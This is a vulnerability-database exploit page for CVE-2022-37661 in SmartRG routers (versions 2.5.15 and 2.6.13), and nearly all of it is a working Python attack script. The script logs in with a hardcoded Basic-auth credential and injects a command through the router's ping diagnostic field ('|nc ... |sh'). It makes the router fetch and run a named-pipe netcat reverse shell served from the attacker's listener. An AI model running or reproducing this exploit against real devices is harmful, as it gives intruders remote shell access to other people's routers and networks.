SmartRG Router 2.6.13 Remote Code Execution

2022.09.13
Risk: High
Local: No
Remote: Yes
CWE: N/A

# Exploit Title: SmartRG Router - Remote Code Execution # Date: 13/06/2022 # Exploit Author: Yerodin Richards # Vendor Homepage: https://adtran.com # Version: 2.5.15 / 2.6.13 (confirmed) # Tested on: SR506n (2.5.15) & SR510n (2.6.13) # CVE : CVE-2022-37661 import requests from subprocess import Popen, PIPE router_host = "http://192.168.1.1" authorization_header = "YWRtaW46QWRtMW5ATDFtMyM=" lhost = "lo" lport = 80 payload_port = 81 def main(): e_proc = Popen(["echo", f"rm /tmp/s & mknod /tmp/s p & /bin/sh 0< /tmp/s | nc {lhost} {lport} > /tmp/s"], stdout=PIPE) Popen(["nc", "-nlvp", f"{payload_port}"], stdin=e_proc.stdout) send_payload(f"|nc {lhost} {payload_port}|sh") print("done.. check shell") def get_session(): url = router_host + "/admin/ping.html" headers = {"Authorization": "Basic {}".format(authorization_header)} r = requests.get(url, headers=headers).text i = r.find("&sessionKey=") + len("&sessionKey=") s = "" while r[i] != "'": s = s + r[i] i = i + 1 return s def send_payload(payload): print(payload) url = router_host + "/admin/pingHost.cmd" headers = {"Authorization": "Basic {}".format(authorization_header)} params = {"action": "add", "targetHostAddress": payload, "sessionKey": get_session()} requests.get(url, headers=headers, params=params).text main()


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top